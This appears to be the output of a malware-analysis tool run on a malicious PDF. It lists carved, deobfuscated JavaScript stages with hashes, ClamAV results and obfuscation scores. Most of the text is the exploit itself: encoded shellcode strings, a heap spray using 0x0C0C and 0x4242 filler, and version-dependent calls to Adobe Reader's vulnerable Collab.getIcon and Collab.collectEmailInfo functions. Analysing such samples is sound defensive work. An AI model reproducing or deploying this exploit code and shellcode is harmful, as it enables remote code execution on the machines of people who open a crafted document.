if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0CWRJJ4919WRJJ0700%u12bb%u0700WRJJ1022WRJJ0700%u0C0C%u0C0C%u0C0C%u0C0CWRJJ1599WRJJ0700WRJJ0124WRJJ0001WRJJ72f7WRJJ0700WRJJ0104WRJJ0001WRJJ15bbWRJJ0700WRJJ1000WRJJ0000WRJJ154dWRJJ0700WRJJ15bbWRJJ0700WRJJ0300WRJJ7ffeWRJJ7fb2WRJJ0700WRJJ15bbWRJJ0700WRJJ0011WRJJ0001WRJJa8acWRJJ0700WRJJ15bbWRJJ0700WRJJ0100WRJJ0001WRJJa8acWRJJ0700WRJJ72f7WRJJ0700WRJJ0011WRJJ0001WRJJ52e2WRJJ0700WRJJ5c54WRJJ0700WRJJffffWRJJffffWRJJ0100WRJJ0001WRJJ0000WRJJ0000WRJJ0104WRJJ0001WRJJ1000WRJJ0000WRJJ0040WRJJ0000WRJJd731WRJJ0700WRJJ15bbWRJJ0700WRJJ905aWRJJ9054WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJeb5aWRJJ5815WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ1a8bWRJJ1889WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ04c2WRJJfb81WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ffWRJJ154dWRJJ0700WRJJd731WRJJ0700WRJJ112fWRJJ0700WRJJ3030WRJJ3030%u0C0c" +
"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" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cfWRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48edWRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70edWRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery split-literal-normalize -> marker-WRJJ-to-%u from JavaScript object 27 at offset 0x5C5E6 | 8630 bytes |

SHA-256: 454307cdc37a22bb2ec5b03eb3798aab0155175c3c2bca448bbe2140ed8d2a8b
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 16 of 24 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
%u14eb%ub258%u8a98%u3218%u88da%u4018%u3881%udada%udada%uf175%u05eb%ue7e8%uffff%u64ff%u17f0%u806a%uf0f9%u7e23%ua2b7%uc9f0%u3ab7%uf099%u7aa1%u1be5%uc2f0%ubc4c%uf00c%u0e2a%uc3cf%u7bf0%uff0f%uf019%ufecf%u6795%u03f0%u131f%uf07d%uae2a%u8b97%udbf0%u3426%uf043%u8b16%u3492%uaaf0%u09ec%u1394%u1b6c%ud874%u6413%u4aab%u4aab%u13fc%ua8c2%ud313%u1394%u84d1%uf113%u1390%ub8d9%u9113%uc8a0%ued80%u356b")
)
;
sc2=unes(strexchg("%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7")
)
sc3=unes(strexchg("%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67")
)
sc4=unes(strexchg("%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u3030%u3030%u0C0c" +
"%u14eb%ub258%u8a98%u3218%u88da%u4018%u3881%udada%udada%uf175%u05eb%ue7e8%uffff%u64ff%u17f0%u806a%uf0f9%u7e23%ua2b7%uc9f0%u3ab7%uf099%u7aa1%u1be5%uc2f0%ubc4c%uf00c%u0e2a%uc3cf%u7bf0%uff0f%uf019%ufecf%u6795%u03f0%u131f%uf07d%uae2a%u8b97%udbf0%u3426%uf043%u8b16%u3492%uaaf0%u09ec%u1394%u1b6c%ud874%u6413%u4aab%u4aab%u13fc%ua8c2%ud313%u1394%u84d1%uf113%u1390%ub8d9%u9113%uc8a0%ued80%u356b%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9" +
"%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0c0C%u0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}

generic_stage_recovery_002.js
deobfuscated-js | generic stage recovery split-literal-normalize -> marker-WRJJ-to-%u from JavaScript object 27 at offset 0x5C5E6 | 8215 bytes
SHA-256: ee83449659f83831df5389a4ef732ec0bc9c9b5505d2bde1b63f7aaf486c28d3

Detection
ClamAV: No threats found
Obfuscation or payload: likely
16 of 24 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
sc3=unes(strexchg(/* %u-encoded payload string omitted */))
sc4=unes(strexchg(/* %u-encoded payload string omitted */));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg(/* %u-encoded payload string omitted */));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0c0C%u0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}

js_property_alias_stage_000.js
deobfuscated-js | JavaScript property alias normalized stage at offset 0x5C5E6 | 10826 bytes
SHA-256: 770f3d14299f289ef61f7495b00277afb2432b33dde4bf157f1fa3dba8f7ba38

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 73 of 92 identifiers look randomly generated (e.g. 'WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154d') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["viewerVersion"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="byteToChar";
var strTempB="getIcon";
var strTempC="collectEmailInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"%u");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["length"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["substr"](x,2)));//
}
return ret;
}
sc1=unes(strexchg(/* WRJJ-marked payload string omitted */))
;
sc2=unes(strexchg(/* WRJJ-marked payload string omitted */))
sc3=unes(strexchg(/* WRJJ-marked payload string omitted */))
sc4=unes(strexchg(/* WRJJ-marked payload string omitted */));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["_N.bundle"];//next time
var b=5;//shlshgl
Collab.getIcon(of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) +""+ sc
bbk = unes("%u4242%u4242");
wap = 20+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("%u0a0a%u0a0a"));
if (app["viewerVersion"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["viewerVersion"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg(/* mixed %u / WRJJ-marked payload string omitted */));
